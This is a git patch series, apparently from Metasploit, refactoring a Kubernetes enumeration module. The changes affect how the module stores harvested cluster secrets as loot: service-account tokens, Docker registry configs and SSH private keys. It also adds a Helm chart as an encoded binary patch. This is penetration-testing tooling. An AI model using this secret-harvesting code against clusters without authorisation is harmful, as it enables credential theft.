--- a/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb
+++ b/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb
@@ -59,8 +59,7 @@ def initialize(info = {})
         Msf::OptInt.new('SESSION', [false, 'An optional session to use for configuration']),
         OptRegexp.new('HIGHLIGHT_NAME_PATTERN', [true, 'PCRE regex of resource names to highlight', 'username|password|user|pass']),
         OptString.new('NAME', [false, 'The name of the resource to enumerate', nil]),
-        OptEnum.new('OUTPUT', [true, 'output format to use', 'table', ['table', 'json']]),
-        OptString.new('NAMESPACE_LIST', [false, 'The default namespace list to iterate when the current token does not have the permission to retrieve the available namespaces', 'default,dev,staging,production,kube-node-lease,kube-lease,kube-system'])
+        OptEnum.new('OUTPUT', [true, 'output format to use', 'table', ['table', 'json']])
       ]
     )
   end

From 547c561ea952e424a1b5c95561498da007c3f655 Mon Sep 17 00:00:00 2001
From: adfoster-r7 <alandavid_foster@rapid7.com>
Date: Mon, 11 Oct 2021 13:55:45 +0100
Subject: [PATCH 3/4] Correctly store extracted loot

---
 lib/msf/core/auxiliary/report.rb                     |  2 +-
 .../exploit/remote/http/kubernetes/enumeration.rb    | 12 ++++++------
 2 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb
index 4f1f72eb62b1..b259e943c780 100644
--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -396,7 +396,7 @@ def store_loot(ltype, ctype, host, data, filename=nil, info=nil, service=nil)
     ext = 'bin'
     if filename
       parts = filename.to_s.split('.')
-      if parts.length > 1 and parts[-1].length < 4
+      if parts.length > 1 and parts[-1].length <= 4
         ext = parts[-1]
       end
     end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb b/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
index a9ba8eafc09d..652990208fd8 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
@@ -131,7 +131,8 @@ def report_secrets(namespace, secrets)
       loot_name_prefix = [
         datastore['RHOST'],
         namespace,
-        resource_name
+        resource_name,
+        secret[:type].gsub(/[a-zA-Z]/, '-').downcase
       ].join('_')
 
       case secret[:type]
@@ -170,19 +171,18 @@ def report_secrets(namespace, secrets)
         %i[namespace token].each do |key|
           data[key] = Rex::Text.decode_base64(data[key])
         end
-        loot_name = loot_name_prefix + '-token'
-
+        loot_name = loot_name_prefix + '.json'
         path = store_loot('kubernetes.token', 'application/json', datastore['RHOST'], JSON.pretty_generate(data), loot_name)
         print_good("service token #{resource_name}: #{path}")
       when Msf::Exploit::Remote::HTTP::Kubernetes::Secret::DockerConfigurationJson
         json = Rex::Text.decode_base64(secret.dig(:data, :".dockerconfigjson"))
-        loot_name = loot_name_prefix + '-json'
+        loot_name = loot_name_prefix + '.json'
 
         path = store_loot('docker.json', 'application/json', nil, json, loot_name)
         print_good("dockerconfig json #{resource_name}: #{path}")
       when Msf::Exploit::Remote::HTTP::Kubernetes::Secret::SSHAuth
         data = Rex::Text.decode_base64(secret.dig(:data, :"ssh-privatekey"))
-        loot_name = loot_name_prefix + '-ssh_key'
+        loot_name = loot_name_prefix + '.key'
         private_key = parse_private_key(data)
 
         credential = credential_data.merge(
@@ -198,7 +198,7 @@ def report_secrets(namespace, secrets)
           vprint_error("Unable to store #{loot_name} as a valid ssh_key pair")
         end
 
-        path = store_loot('id_rsa', 'text/plain', nil, json, loot_name)
+        path = store_loot('id_rsa', 'text/plain', nil, data, loot_name)
         print_good("ssh_key #{resource_name}: #{path}")
       end
     rescue StandardError => e

From 0d3d0e9fe592659e561104a4b3a636d230df5ce6 Mon Sep 17 00:00:00 2001
From: adfoster-r7 <alandavid_foster@rapid7.com>
Date: Tue, 12 Oct 2021 16:59:07 +0100
Subject: [PATCH 4/4] Print token claims

---
 .../metasploit/charts/postgresql-10.12.2.tgz  | Bin 0 -> 52826 bytes
 .../remote/http/kubernetes/enumeration.rb     |   8 ++++--
 .../remote/http/kubernetes/output/json.rb     |   4 +++
 .../remote/http/kubernetes/output/table.rb    |  27 +++++++++++++++++-
 4 files changed, 35 insertions(+), 4 deletions(-)
 create mode 100644 kubernetes/metasploit/charts/postgresql-10.12.2.tgz

diff --git a/kubernetes/metasploit/charts/postgresql-10.12.2.tgz b/kubernetes/metasploit/charts/postgresql-10.12.2.tgz
new file mode 100644
index 0000000000000000000000000000000000000000..aeebe67310a83c65d529ecdef8324a838569dbbf
GIT binary patch
literal 52826
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
